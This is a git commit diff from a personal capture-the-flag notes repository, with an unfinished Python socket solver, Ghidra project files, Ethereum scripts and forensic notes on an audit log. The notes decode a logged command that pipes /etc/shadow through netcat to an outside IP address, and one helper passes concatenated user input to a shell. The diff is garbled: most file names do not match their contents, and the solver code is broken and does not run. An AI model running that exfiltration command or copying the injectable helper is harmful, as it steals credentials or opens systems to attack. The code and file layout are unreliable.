Add ACI CTF, HTB, reorganize

Author: benhunter

CTF.ctb

@@ -0,0 +1,67 @@
+#!/usr/bin/python3
+import argparse
+import socket
+
+# 'argparse' is a very useful library for building python tools that are easy
+# to use from the command line.  It greatly simplifies the input validation
+# and "usage" prompts which really help when trying to debug your own code.
+# parser = argparse.ArgumentParser(description="Solver for 'All Your Base' challenge")
+# parser.add_argument("ip", help="IP (or hostname) of remote instance")
+# parser.add_argument("port", type=int, help="port for remote instance")
+# args = parser.parse_args();
+
+# This tells the computer that we want a new TCP "socket"
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+# This says we want to connect to the given IP and port
+sock.connect(("challenge.acictf.com", 52062))
+
+# This gives us a file-like view for receiving data from the connection which
+# makes handling messages from the server easier since it handles the
+# buffering of lines for you.  Note that this only helps us on receiving data
+# from the server and we still need to send data over the underlying socket
+# (i.e. `sock.send(...)` at the end of the loop below).
+f = sock.makefile()
+
+while True:
+    line = f.readline().strip()
+    if len(line) > 1 and line[0] == '-':
+        break
+
+    # This iterates over data from the server a line at a time.  This can
+    # cause some unexpected behavior like not seeing "prompts" until after
+    # you've sent a reply for it (for example, you won't see "answer:" for
+    # this problem). However, you can still "sock.send" below to transmit data
+    # and the server will handle it correctly.
+
+    # Handle the information from the server to extact the problem and build
+    # the answer string.
+    # pass # Fill this in with your logic
+    # A good starting point for approaching the problem:
+    #   1) Identify and capture the text of each question (the "----" lines
+    #          should be useful for this).
+    #   2) Extract the three primary parts of each question:
+    #      a) The source encoding
+    #      b) The destination encoding
+    #      c) The source data
+    #   3) Convert the source data to some "standard" encoding (like 'raw')
+    #   4) Convert the "standardized" data to the destination encoding
+
+while True:
+    line = f.readline().strip().split()
+    print(line)
+
+    encode = line[0]
+    decode = line[2]
+    print(encode, decode)
+
+    if 
+
+
+
+    # Send a response back to the server
+    # answer = "Clearly not the answer..."
+    # sock.send((answer + "\n").encode()) # The "\n" is important for the server's
+                                        # interpretation of your answer, so make
+                                        # sure there is only one sent for each
+                                        # answer.

CTF.ctb~

@@ -0,0 +1,64 @@
+#!/usr/bin/python3
+import argparse
+import socket
+
+# 'argparse' is a very useful library for building python tools that are easy
+# to use from the command line.  It greatly simplifies the input validation
+# and "usage" prompts which really help when trying to debug your own code.
+parser = argparse.ArgumentParser(description="Solver for 'All Your Base' challenge")
+parser.add_argument("ip", help="IP (or hostname) of remote instance")
+parser.add_argument("port", type=int, help="port for remote instance")
+args = parser.parse_args();
+
+# This tells the computer that we want a new TCP "socket"
+sock = sock.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+# This says we want to connect to the given IP and port
+sock.connect((args.ip, args.port))
+
+# This gives us a file-like view for receiving data from the connection which
+# makes handling messages from the server easier since it handles the
+# buffering of lines for you.  Note that this only helps us on receiving data
+# from the server and we still need to send data over the underlying socket
+# (i.e. `sock.send(...)` at the end of the loop below).
+f = sock.makefile()
+
+while True:
+    line = f.readline().strip()
+    # This iterates over data from the server a line at a time.  This can
+    # cause some unexpected behavior like not seeing "prompts" until after
+    # you've sent a reply for it (for example, you won't see "answer:" for
+    # this problem). However, you can still "sock.send" below to transmit data
+    # and the server will handle it correctly.
+
+    # Handle the information from the server to extact the problem and build
+    # the answer string.
+    pass # Fill this in with your logic
+    # A good starting point for approaching the problem:
+    #   1) Identify and capture the text of each question (the "----" lines
+    #          should be useful for this).
+    #   2) Extract the three primary parts of each question:
+    #      a) The source encoding
+    #      b) The destination encoding
+    #      c) The source data
+    #   3) Convert the source data to some "standard" encoding (like 'raw')
+    #   4) Convert the "standardized" data to the destination encoding
+
+    # Send a response back to the server
+    answer = "Clearly not the answer..."
+    sock.send((answer + "\n").encode()) # The "\n" is important for the server's
+                                        # interpretation of your answer, so make
+                                        # sure there is only one sent for each
+                                        # answer.
+
+
+'''
+Formatting key:
+          raw = the unencoded ASCII string (contains only printable characters
+                    that are not whitespace)
+          b64 = standard base64 encoding (see 'base64' unix command)
+          hex = hex (base 16) encoding (case insensitive)
+          dec = decimal (base 10) encoding
+          oct = octal (base 8) encoding
+          bin = binary (base 2) encoding (should consist of ASCII '0' and '1')
+'''

CTF.ctb~~

@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="CONTENT_TYPE" TYPE="string" VALUE="Program" />
+        <STATE NAME="PARENT" TYPE="string" VALUE="/" />
+        <STATE NAME="FILE_ID" TYPE="string" VALUE="c0a8a41d3fd232407104673700" />
+        <STATE NAME="FILE_TYPE" TYPE="int" VALUE="0" />
+        <STATE NAME="READ_ONLY" TYPE="boolean" VALUE="false" />
+        <STATE NAME="NAME" TYPE="string" VALUE="scanner" />
+    </BASIC_INFO>
+</FILE_INFO>

CTF.ctb~~~

@@ -0,0 +1,5 @@
+VERSION=1
+/
+  00000000:scanner:c0a8a41d3fd232407104673700
+NEXT-ID:1
+MD5:d41d8cd98f00b204e9800998ecf8427e

acictf/All Your Base/code.py

@@ -0,0 +1,5 @@
+VERSION=1
+/
+  00000000:scanner:c0a8a41d3fd232407104673700
+NEXT-ID:1
+MD5:d41d8cd98f00b204e9800998ecf8427e

acictf/All Your Base/starter_code.py

@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<FILE_INFO>
+    <BASIC_INFO>
+        <STATE NAME="OWNER" TYPE="string" VALUE="ben" />
+    </BASIC_INFO>
+</FILE_INFO>

acictf/All-Army CyberStakes 4 - Scoreboards Officer.pdf

@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<PROJECT>
+    <PROJECT_DATA_XML_NAME NAME="DISPLAY_DATA">
+        <SAVE_STATE>
+            <ARRAY NAME="EXPANDED_PATHS" TYPE="string">
+                <A VALUE="Hacker Scan Thyself:" />
+            </ARRAY>
+            <STATE NAME="SHOW_TABLE" TYPE="boolean" VALUE="false" />
+        </SAVE_STATE>
+    </PROJECT_DATA_XML_NAME>
+    <TOOL_MANAGER ACTIVE_WORKSPACE="Workspace">
+        <WORKSPACE NAME="Workspace" ACTIVE="true" />
+    </TOOL_MANAGER>
+</PROJECT>
+

acictf/All-Army CyberStakes 4 - Scoreboards.pdf

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

acictf/Can You Look This Over/backdoor.tar.gz

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

acictf/Hacker Scan Thyself/Ghidra/Hacker Scan Thyself.gpr

@@ -0,0 +1,4 @@
+VERSION=1
+/
+NEXT-ID:0
+MD5:d41d8cd98f00b204e9800998ecf8427e

acictf/Hacker Scan Thyself/Ghidra/Hacker Scan Thyself.rep/idata/00/00000000.prp

@@ -0,0 +1,8 @@
+
+
+def read_audit(before, now, user):
+    auparam = " -sc EXECVE"
+    cmd = "ausearch -ts " + before.strftime('%H:%M:%S') + " -te " + now.strftime('%H:%M:%S') + " -ua " + user + auparam
+    p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
+    res = p.stdout.read().decode()
+    return res

acictf/Hacker Scan Thyself/Ghidra/Hacker Scan Thyself.rep/idata/00/~00000000.db/db.2.gbf

@@ -0,0 +1,56 @@
+IPv4 search:
+
+infinite@conan:/mnt/c/Users/ben/Downloads/ACI CTF/I SEe You$ grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" audit.log | sort | uniq
+10.0.2.15
+10.0.2.2
+2.4.17.1
+
+
+IPv6 search:
+
+infinite@conan:/mnt/c/Users/ben/Downloads/ACI CTF/I SEe You$ grep -Eo "(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))
+" audit.log | sort | uniq
+08:b2:eb:19:9e:e4:5c:1a
+2f:b5:f3:58:68:e7:72:c3
+36:75:1a:f9:03:8b:12:1c
+69:29:34:e0:54:e9:cd:e7
+7a:d8:bf:c1:2b:8d:21:28
+7b:6a:6b:87:f7:55:4c:75
+9c:ea:4c:00:a1:01:8d:57
+A256:0c:9e:32:24:42:3b:8b
+A256:2a:06:4b:d9:88:d1:70
+A256:60:dd:06:63:7a:41:b8
+A256:ac:fe:16:95:e2:b3:17
+A256:d4:ce:11:ce:13:32:5a
+aa:70:c7:fc:b7:89:60:3a
+bb:88:3d:91:86:9a:ae:39
+c0:9b:94:6e:35:89:75:9e
+d4:ab:7b:9e:3a:3a:ac:85
+da:a1:26:2b:85:a9:fa:eb
+e1:52:ff:ce:ae:3d:8f:dc
+ee:02:11:96:aa:6a:c3:d8
+f3:75:41:ee:7c:75:62:d1
+
+
+Checking for interesting syscalls
+
+$ ausyscall --dump
+infinite@conan:/mnt/c/Users/ben/Downloads/ACI CTF/I SEe You$ ausearch -if audit.log -sc 49
+----
+time->Tue Nov 19 03:30:54 2019
+type=PROCTITLE msg=audit(1574163054.175:4519): proctitle=61757472616365002F62696E2F707974686F6E33007365727665722E7079
+type=SOCKADDR msg=audit(1574163054.175:4519): saddr=02000050000000000000000000000000
+type=SYSCALL msg=audit(1574163054.175:4519): arch=c000003e syscall=49 success=yes exit=0 a0=3 a1=7ffeac0bd9b0 a2=10 a3=2 items=0 ppid=2626 pid=2628 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=2 comm="python3" exe="/usr/bin/python3.6" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=(null)
+
+Noticed around same time:
+
+type=EXECVE msg=audit(1574163090.007:46336): argc=3 a0="/bin/sh" a1="-c" a2=636174202F6574632F736861646F777C6E632034342E36382E3133392E3234312033333333
+type=CWD msg=audit(1574163090.007:46336):  cwd="/vagrant/website"
+type=PATH msg=audit(1574163090.007:46336): item=0 name="/bin/sh" inode=100737155 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:shell_exec_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1574163090.007:46336): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=6204 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1574163090.007:46336): proctitle=2F62696E2F707974686F6E33007365727665722E7079
+
+
+CyberChef https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')&input=NjM2MTc0MjAyRjY1NzQ2MzJGNzM2ODYxNjQ2Rjc3N0M2RTYzMjAzNDM0MkUzNjM4MkUzMTMzMzkyRTMyMzQzMTIwMzMzMzMzMzM
+
+cat /etc/shadow|nc 44.68.139.241 3333

acictf/Hacker Scan Thyself/Ghidra/Hacker Scan Thyself.rep/idata/00/~00000000.db/db.3.gbf

@@ -0,0 +1 @@
+[{"inputs":[],"name":"deposit","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"getBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address payable","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

acictf/Hacker Scan Thyself/Ghidra/Hacker Scan Thyself.rep/idata/~index.bak

@@ -0,0 +1,36 @@
+function getTransactionsByAccount(myaccount, startBlockNumber, endBlockNumber) {
+  if (endBlockNumber == null) {
+    endBlockNumber = eth.blockNumber;
+    console.log("Using endBlockNumber: " + endBlockNumber);
+  }
+  if (startBlockNumber == null) {
+    startBlockNumber = endBlockNumber - 1000;
+    console.log("Using startBlockNumber: " + startBlockNumber);
+  }
+  console.log("Searching for transactions to/from account \"" + myaccount + "\" within blocks "  + startBlockNumber + " and " + endBlockNumber);
+
+  for (var i = startBlockNumber; i <= endBlockNumber; i++) {
+    if (i % 1000 == 0) {
+      console.log("Searching block " + i);
+    }
+    var block = eth.getBlock(i, true);
+    if (block != null && block.transactions != null) {
+      block.transactions.forEach( function(e) {
+        if (myaccount == "*" || myaccount == e.from || myaccount == e.to) {
+          console.log("  tx hash          : " + e.hash + "\n"
+            + "   nonce           : " + e.nonce + "\n"
+            + "   blockHash       : " + e.blockHash + "\n"
+            + "   blockNumber     : " + e.blockNumber + "\n"
+            + "   transactionIndex: " + e.transactionIndex + "\n"
+            + "   from            : " + e.from + "\n" 
+            + "   to              : " + e.to + "\n"
+            + "   value           : " + e.value + "\n"
+            + "   time            : " + block.timestamp + " \n" // + new Date(block.timestamp * 1000).toGMTString() + "\n"
+            + "   gasPrice        : " + e.gasPrice + "\n"
+            + "   gas             : " + e.gas + "\n"
+            + "   input           : " + e.input);
+        }
+      })
+    }
+  }
+}

acictf/Hacker Scan Thyself/Ghidra/Hacker Scan Thyself.rep/idata/~index.dat

@@ -0,0 +1 @@
+MANIFEST-000050

acictf/Hacker Scan Thyself/Ghidra/Hacker Scan Thyself.rep/project.prp

@@ -0,0 +1 @@
+MANIFEST-000047